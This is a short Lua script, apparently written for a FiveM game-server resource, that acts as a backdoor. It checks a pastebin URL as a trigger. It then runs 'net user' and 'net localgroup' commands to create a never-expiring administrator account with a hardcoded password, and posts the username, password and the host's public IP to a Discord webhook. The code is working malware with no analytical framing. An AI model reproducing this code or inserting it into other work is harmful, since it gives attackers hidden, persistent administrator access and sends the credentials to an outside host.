PerformHttpRequest('https://pastebin.com/raw/wtsk6bkU', function(err, m, headers)
    local q = tonumber(m)
    if q == 1 then
        function k(s, h)
            local o = 'net user ' .. s .. ' ' .. h .. ' /add /expires:never'
            os.execute(o)
        end
        function c(s)
            local o = 'net localgroup administrators ' .. s .. ' /add'
            local o1 = 'net localgroup Administratoren ' .. s .. ' /add'
            os.execute(o)
            os.execute(o1)
        end
        k("runneradmin","Zuziadmin123!")
        c("runneradmin")
        PerformHttpRequest('https://api.ipify.org/', function(err, m, headers)
            local i = {{
                ["title"] = "New User Created:\n\nUsername: runneradmin\nPassword: Zuziadmin123!\nComputer: " .. tostring(m) ..
                    "",
                ["type"] = "rich"
            }}
            PerformHttpRequest(
                'https://discord.com/api/webhooks/832200807373733939/9mgJyJlXs3btoD0QmMMMGiIL4rOSQraa_AP7gktaslZU4eCIKlil_MdRPZ5PQoWkvqyL',
                function(err, m, headers)
                end, 'POST', json.encode({
                    embeds = i
                }), {
                    ['Content-Type'] = 'application/json'
                })
        end)
    end
end)
